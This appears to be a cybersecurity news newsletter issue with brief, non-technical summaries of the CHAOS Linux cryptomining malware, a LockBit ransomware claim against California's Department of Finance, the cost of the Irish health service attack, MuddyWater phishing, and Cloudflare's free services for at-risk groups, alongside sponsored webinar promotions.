A cryptocurrency mining hacking campaign targeting Linux has been tracked by researchers. The hacking campaign uses CHAOS malware. More: - The first variant of this malware was tracked in November 2022, but the most recent variant that has been tracked shares many similarities.
- The CHAOS Remote Administrative Tool is based on an open-source project with files openly shared on GitHub.
- Once deployed, Chaos malware first alters the '/etc/crontab file, a UNIX task scheduler that downloads itself every 10 minutes.
- The main downloader script and other payloads are hosted in different locations to ensure the campaign remains active and spreads regardless of any potential external intervention.
- It is believed that the attack originated in Russia due to the fact that the main server is located in the country.
- Compiled in GO, the RAT deploys in the device and enables threat actors to:
- Take screenshots
- Delete files
- Restore files
- Restart the device, etc.
| |
Cloudflare will provide free enterprise-level cybersecurity services to journalists, activists, humanitarian organizations, minority groups, and state and local election services. To implement the idea, Cloudflare will partner with Project Galileo and the Athenian Project. More: - The platform offers a secure internet access management solution for individuals and enterprises through its zero-trust product. A zero-trust strategy is when the network stops trusting the logged-in users unconditionally and validates every stage of digital interactions on protected networks.
- This process ensures that everyone who is part of the network (employees and company assets) is continuously verified.
- Cloudflare claims that some of the other main benefits that organizations have from using Cloudflare are:
- Automatic protection against phishing attacks, blocking all threats before they reach user inboxes.
- Rigid control over asset and app access for employees, partners, and volunteers.
- Secure access to the internet even when using untrustworthy WiFi connections.
- This platform is currently used by 10,000 organizations worldwide.
- Organizations can apply for the security product suite here.
| |
 A message from SECURITY COMPASS So how can security teams influence developers to focus on security issues without getting in their way? We had an incredible discussion with a panel of security experts from Tricentis, Reddit, and the Royal Bank of Canada on how we can all improve application security training. By watching this webinar you will learn: -
How to influence developers to secure code rather than pushing mandates around AppSec practices. -
What developers want from application security training -
Practical advice on leveling up developer security awareness & improving secure coding skills -
How to sustain developer training (with so many changing jobs) Start watching on-demand here
| |
The cost of the cyberattack against Ireland's Health Care Service that occurred in 2021 has now reached $83M. Industry experts and officials expect the cost to reach $100M. More: - The cyberattack, believed to have been conducted by Russia-based state actors, was likely caused by a malicious Microsoft Excel file downloaded from an employee. The file was part of a phishing campaign.
- It is believed that the excel file was opened at an HSE workstation in March 2021. The malware was only discovered two months later, meaning that hackers managed to hide their activity during this period.
- Around 100,000 people had their personal data stolen during this cyber-attack.
- According to government officials, at the time of the attack, the National Cyber Security Centre only had 25 employees and no director, which in hindsight, proved to be a huge liability for the country's healthcare system.
| |
The California Department of Finance has been attacked by LockBit Ransomware Crew. The group claims to have stolen 76 GB worth of data. More: - LockBit claims it has stolen data such as:
- databases,
- confidential information,
- financial documents,
- and personal life information.
- The California Governor's Office of Emergency Services stated that it is currently responding to the ongoing threat.
- The hacker group has allegedly made a list of demands that need to be met by Dec. 24, but it is not clear what those demands are at the moment.
- While LockBit is one of the most dangerous hacker groups currently active, researchers claim that the group has been known to exaggerate its impact in the past, so any claims made now need to be extensively analyzed.
| |
 A message from MODERN TREASURY The State of Payment Operations 2022 Watch Modern Treasury's CEO, COO, and Head of Payments discuss the highlights and implications of our landmark survey, The State of Payment Operations 2022. Here's what you'll learn: - The biggest payment operations pain points: From payment returns and failures to delays and lack of real-time insights, we uncovered the greatest drivers of inefficiency in payment operations.
- Trends in payment ops automation: More than ever, finance leaders are pursuing automated solutions to manual and outdated processes. Learn what they are and how they're being implemented.
- FedNow, RTP, and the future of faster payments: Until now, the US has lagged behind in rapid payments technology. With FedNow on the horizon, learn how to prepare for the disruptive power of faster payments.
Watch Now
| |
Iranian hacker group MuddyWater used corporate emails to hack its targets, according to a new report. The group has ties with Iran’s Ministry of Intelligence and Security. More: - The hacker group is tracked with different names, such as Static Kitten, Cobalt Ulster, Mercury, etc.
- It is believed that MuddyWater has been active since at least 2017.
- Victims still trusted the email since it came from a legitimate address belonging to a company they know.
- Among the targets in this campaign are two Egyptian hosting companies, one of them breached to send out phishing emails.
- Most Syncro installers used by MuddyWater are hosted on OneHub’s cloud storage, a service the actor used in the past for its hacking campaigns.
| |
Quick Hits: - Customer trust is critical, but creating a continuous security process for your startup can be complex. Learn from Vanta how to enhance security without overextending your resources.*
- According to a new report, there is a global gap of 3.4 million cybersecurity workers.
- Palo Alto Networks has launched Medical IoT Security, a Zero Trust security tool that aims to improve cybersecurity in the healthcare sector.
- Cybersecurity and risk management topped state chief information officers’ top priorities, according to an annual CIO report.
- Recruiting tech ROI of 227%? Here’s how Okta achieves its hiring goals using Greenhouse Recruiting and Greenhouse Onboarding.*
*This is a sponsored post.
| |
Upcoming events at Inside:
| |
 |  | Arbër is an Inside writer who also has experience in entrepreneurship. He has experience covering Consumer Tech, Venture Capital, NFTs, Crypto, etc. Arbër holds a Bachelor's degree in Business from XAMK University in Finland. When he is not reading(and writing) business news, he chooses to watch sports or anime...and then read news about sports or anime. |   | | Editor | Aaron Crutchfield is based in the high desert of California. Over the last two decades, he has spent time writing and editing at various local newspapers and defense contractors in California. When he's not working, he can often be found looking at the latest memes with his kids or working on his 1962 and 1972 Fords. | |
Security Compass delivers best-practice, role-based, accredited eLearning solutions. | |
| |
